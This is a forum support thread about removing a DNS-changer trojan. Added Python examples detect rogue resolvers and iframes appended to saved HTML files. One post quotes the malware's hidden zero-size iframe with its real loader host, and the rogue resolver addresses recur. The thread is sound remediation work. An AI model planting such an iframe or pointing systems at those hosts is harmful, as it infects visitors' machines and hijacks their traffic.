Trojan DNS Changer - 85.255.113.90

vinny

Dear Sirs,

I was wondering if someone could please help me with a persistent Trojan infection. I use Spyware Doctor and every time I do a scan it detects and "cleans" 2 Trojan DNS Changer viruses - one that points to 85.255.113.90 and another that points to 85.255.112.5. However, after rebooting the viruses are still there and any mails that I send via Outlook are infected.

Tech Support at Spyware Doctor are unable to help, which is why I have turned here in desperation. I am not good with computers and this is the first time I have posted to any kind of forum, so please forgive me if I've not acted according to protocol.

From what I can tell, the normal practice is to send an HJT log file, so here goes:
 
Hello and welcome to Techspot.

Very Important: Before deciding whether you should clean or reformat your system, go and read this thread HERE and decide what it is you want to do.

If after reading the above, you wish to clean your system, do the following.

Go and read the Viruses/Spyware/Malware, preliminary removal instructions. Follow all the instructions exactly.

Post fresh HJT, AVG Antispyware and Combofix logs as attachments into this thread, only after doing the above.

Also, let me know the results of the AVG Antirootkit scan.

Regards Howard :wave: :wave:

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Dear Howard,

First of all, thank you for helping me. I decided to clean rather than reinstall and followed all 15 steps - it took me the better part of a day and was a humbling experience. I think I'm still infected as my latest AVG scan picked out a couple of viruses that it said are now healed, but perhaps you could confirm.

The viruses were aaw2007.exe and a restore file called A0084198.exe

The AVGAS, HJT and Combofix logs are attached. The Antirootkit Scan was clean.

Thanks again
Vinny

Seems the Combofix file didn't get attached, so here it is.
 
Your system has been hijacked.

Please do the following.

Delete all files in AVG Antispyware quarantine.

Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://www.bleepingcomputer.com/files/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, make sure "Run fixit" is checked and click Finish.
The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

Thereafter, please post fresh HJT, Combofix and C:\fixwareout\report.txt logs as well as a fresh AVG Antispyware log if anything is found.

Regards Howard :)

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Howard, thanks for the speedy reply. Do you get any sleep?

Attached are fresh logs from HJT, Combofix, FixWareout and AVG-AS. Looks like there's still something there - the HJT log still shows 85.255.113.90 and 85.255.112.5, and AVG-AS found and cleaned a Trojan Downloader.

Please advise.

Ta everso,
Vinny
 
You might want to copy and paste these instructions into a notepad file. Then you can have the file open in safe mode, so you can follow the instructions more easily.

Boot into safe mode, under your normal user name (NOT THE ADMINISTRATOR ACCOUNT). See how HERE.

In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how HERE.

Delete all files in AVG Antispyware quarantine.

Open your task manager, by holding down the ctrl and alt keys and pressing the delete key.

Click on the processes tab and end process for (if there):

Q330995.exe

Close task manager.

Run HJT with no other programmes open (except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to (if there):

O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~1\tools\iesdsg.dll (file missing)

O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - (no file)

O16 - DPF: {003FACAF-40CB-4358-96D2-B0D8CEF4DBF5} (SKeyHelper Class) - https://bet.hongkongjockeyclub.com/ib/skey/en/cab/EWinSKey.CAB

O16 - DPF: {11311111-1111-1111-1111-111111111157} - file://C:\Recycled\Q330995.exe

O16 - DPF: {3EA4FA88-E0BE-419A-A732-9B79B87A6ED0} (CTVUAxCtrl Object) - http://dl.tvunetworks.com/TVUAx.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{C578FB95-EF20-41EC-A069-A6032374751B}: NameServer = 85.255.113.90 85.255.112.5

O24 - Desktop Component AutorunsDisabled: (no name) - (no file)

Click on the fix checked button.

Close HJT.

Empty your recycle bin.

Reboot into normal mode and rehide your protected OS files.

Turn off system restore (XP/ME only). See how HERE.

Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.

Post a fresh HJT log.

Regards Howard :)

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
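As an added example (not code from the thread or from the HijackThis author), here is a small checker for the O17 entries that HijackThis prints: it pulls the NameServer addresses out of each interface entry and flags any resolver that is neither a private/loopback address (a home router) nor on an explicit allow list. The log lines below are constructed; the hijacked O17 line is the one quoted above, and the benign interface GUID and 192.168.1.1 router address are made up.

```python
"""Flag HijackThis O17 entries whose NameServer points at untrusted resolvers.

Added example, not from the thread. Parses lines of the form
  O17 - HKLM\\System\\CCS\\Services\\Tcpip\\..\\{GUID}: NameServer = ip ip
and reports resolver addresses that are not private/loopback/link-local and
not on the caller's allow list (e.g. the ISP's published resolvers).
"""
import ipaddress
import re

# O17 line format: lazy prefix up to the interface GUID, then the server list.
O17_RE = re.compile(
    r"^O17 - .*?(\{[0-9A-Fa-f-]+\}): NameServer = (?P<servers>[\d.,\s]+)$"
)

def is_trusted(ip, trusted):
    """Accept loopback/private/link-local resolvers and allow-listed addresses."""
    if ip in trusted:
        return True
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # not a parseable address: treat as suspect
        return False
    return addr.is_private or addr.is_loopback or addr.is_link_local

def find_rogue_nameservers(log_lines, trusted=frozenset()):
    """Return [(interface_guid, [untrusted resolver ips])] for suspect O17 lines."""
    findings = []
    for line in log_lines:
        m = O17_RE.match(line.strip())
        if not m:
            continue
        servers = [s for s in re.split(r"[,\s]+", m.group("servers")) if s]
        rogue = [s for s in servers if not is_trusted(s, trusted)]
        if rogue:
            findings.append((m.group(1), rogue))
    return findings

# Constructed sample log: one clean interface pointing at a home router, and
# the hijacked interface quoted in the thread.
SAMPLE_LOG = [
    "O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - (no file)",
    "O17 - HKLM\\System\\CCS\\Services\\Tcpip\\..\\{11111111-2222-3333-4444-555555555555}: NameServer = 192.168.1.1",
    "O17 - HKLM\\System\\CCS\\Services\\Tcpip\\..\\{C578FB95-EF20-41EC-A069-A6032374751B}: NameServer = 85.255.113.90 85.255.112.5",
]

if __name__ == "__main__":
    for guid, ips in find_rogue_nameservers(SAMPLE_LOG):
        print(f"interface {guid}: untrusted resolvers {', '.join(ips)}")
```

Rerunning this over each fresh HJT log is a quick way to see whether the O17 entry has come back after a reboot, which is exactly the pattern this thread turns on.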
 
Morning Howard,

Did everything you asked.

Q330995 was not running, so I didn't need to delete it within Task Manager.

System Restore was tricky - the tutorial said it can only be turned on/off when logged in as Administrator, and because I use XP Home, I had to go into Safe Mode to turn it off. However, it didn't let me turn it back on in Safe Mode, so I had to reboot into Normal Mode and turn it back on. Hope this didn't mess up the process.

Fresh HJT log attached. It looks good to me, but I'm no expert (not by a long shot).

Thanks again for all your help.

Vinny
 
Your HJT log is clean.

If you have any further virus/spyware problems, please post in this thread.

Regards Howard :)

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Hi Howard,

I think I may have celebrated too soon. Someone receiving an email from me today reported that it was infected. I took another HJT scan and can still see those 2 pesky DNS entries - 85.255.113.90 and 85.255.112.5.

I've attached the HJT scan and would be grateful if you could take a look. I'm beginning to worry that there's no way of getting rid of this for good.

Vinny
 
Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://www.bleepingcomputer.com/files/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, make sure "Run fixit" is checked and click Finish.
The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

Run HJT with no other programmes open (except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to (if there):

O17 - HKLM\System\CCS\Services\Tcpip\..\{C578FB95-EF20-41EC-A069-A6032374751B}: NameServer = 85.255.113.90 85.255.112.5

Click on the fix checked button.

Close HJT and reboot your system.

Post a fresh HJT log as well as the C:\fixwareout\report.txt.

Regards Howard :)

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Hi Howard,

Did what you asked. The HJT and FixWareout logs are attached. Looks clean to me now. Do you know why the Trojans reappeared?

Vinny
 
Your HJT log is now clean.

If you have any further virus/spyware problems, please post in this thread.

Regards Howard :)

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
vinny said:
and any mails that I send via Outlook are infected...
It sounds like you have a macro virus, I'm not sure though. If they are, they may have rewritten Outlook's new mail template file (which gets loaded for every new mail), so that every new mail you create has the virus embedded. This is just a guess though...

If they are macro viruses, my only guess as to how to remove them is to reinstall Outlook.
 
It's happened again:

- my emails are infected
- so I do an HJT scan and can see the 85.255.113.90 and 85.255.112.5
- so I clean using FixWareout and it seems to detect and clean the malware
- I do a new HJT scan and the bad stuff is gone

But after a little while, there they are again.

Does someone know what is going on? Do I really need to reinstall Outlook?

Much obliged to all of you for your help.

Vinny
 
I did some searching on other tech boards and think I may have found the source of the problem, though I still don't know how to fix it. Here's an edited version of what I found which describes exactly the problem I'm experiencing:

"All saved html pages *.htm *.html have been secretly appended with
an html script to summon a virus from the internet. Merely viewing
the saved file executes the script and more scripts download to
propagate this insidious malignancy.

The problem of course is that although a scan detects the Trojan, you can never be rid of it as copies of it are continually dispersed throughout
the harddisk!

The *.htm files are secretly scripted with the following html code, placed after the </HTML> end of the file's own code, like this; it then executes when viewed:

</HTML>
<iframe src=http://www.xiangxue.org/222/index.htm width=0 height=0>
</iframe>

This can only be seen by opening the file in notepad, and it may be
repeated many times. The tipoff that this is malicious is that the width
and height specified is '0' - zero dimension, so it will not otherwise display."

Could someone please tell me how to rid myself of this Trojan? Do I need to open every .htm file in Notepad and delete the offending scripts? All 361 of them! I hope there is an easier way.

Thanks,
Vinny
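As an added example (not code from the thread or from any of its posters), here is a scanner that answers the "all 361 of them" question: it walks a folder for .htm/.html files, looks only at whatever sits after the document's own closing </html> tag (that is where the appended iframe lives), reports the iframe sources it finds, and can optionally write a cleaned copy after keeping the original as a .bak file. The sample page is constructed and uses a placeholder host, not the real one quoted above; `scan_tree` is a name chosen here.

```python
import os
import re

# Added example, not from the thread. Everything after the LAST </html> is the
# "trailer"; the injected iframes live there, so that is the only part examined.
CLOSE_RE = re.compile(rb"</html\s*>", re.IGNORECASE)
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(rb"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)  # unquoted src too

def split_trailer(data):
    """Return (document, trailer): bytes through the last </html>, and the rest."""
    matches = list(CLOSE_RE.finditer(data))
    end = matches[-1].end() if matches else len(data)
    return data[:end], data[end:]

def injected_iframes(data):
    """List src values of iframes placed after the document's own </html>."""
    tags = IFRAME_RE.findall(split_trailer(data)[1])
    return [m.group(1).decode("latin-1") if (m := SRC_RE.search(t)) else "" for t in tags]

def clean_document(data):
    """Cut the trailer only when it carries an iframe; otherwise return unchanged."""
    doc, trailer = split_trailer(data)
    return doc + b"\n" if IFRAME_RE.search(trailer) else data

def scan_tree(root, fix=False):
    """Walk root for .htm/.html files and return {path: [srcs]} for infected ones.
    With fix=True the original is renamed to <name>.bak and a cleaned copy written."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            srcs = injected_iframes(data)
            if not srcs:
                continue
            hits[path] = srcs
            if fix:
                os.replace(path, path + ".bak")  # keep the original for reference
                with open(path, "wb") as fh:
                    fh.write(clean_document(data))
    return hits

# Constructed sample: a saved page with the zero-size iframe trailer described
# above (placeholder host, not the real one).
SAMPLE = (b"<html><body><p>saved page</p></body></html>\n"
          b"<iframe src=http://attacker.invalid/222/index.htm width=0 height=0></iframe>\n")
```

Run it first without `fix=True` to get the list of affected files; trailers that carry anything other than an iframe are left alone, so a page that legitimately has a comment after </html> is not truncated.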
 
I think it's probably time to consider a reformat. That should definitely get rid of your problem.

Regards Howard :(

This thread is for the use of vinny only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Find the hosts file on your system:
\windows\system32\drivers\etc

Add this line to that file:
127.0.0.1 www.xiangxue.org
Be sure to have 2 or three spaces after the 127.0.0.1.

Your system will NEVER access that domain again!
 
Also, you could consider not using Outlook Express; a lot of problems are with that program that could get your computer infected even more. You should also consider installing Firefox if you haven't already ;)
 
Answer!!!

I had this problem too, and I found my own way that worked. Not sure if it'll work for all (this is for router users, not sure about others), but here it is:
(you need Malwarebytes Anti-Malware)

disconnect from the internet,
run "regedit" and delete bad registry keys (Malwarebytes will tell you in the log after a scan),
run Malwarebytes to clear any infections,
remove the amended dns settings, (network properties) (IPv6 or what ever, click advanced)
reset the router (if you have one),
run another scan,
restart your computer in safe mode, (just to be safe, and not connect to router)
run Malwarebytes to scan,
restart your computer normally,
run Malwarebytes quick scan, (being "safe" again)
connect to the internet,
perform final scan to ensure it is completely gone. (hope it's gone!!!)
 
I recently had the same issue with a computer that I was working on the other night, and it was a very simple fix for me. Not sure if it will work for you, but give it a shot.

A lot of new viruses are changing the DNS in the IP properties.

Open up Network Connections in Control Panel and right click on Local Area Connection. Go to Properties, select "Internet Protocol (TCP/IP)", hit Properties and make sure that "Obtain DNS server address automatically" is selected.
 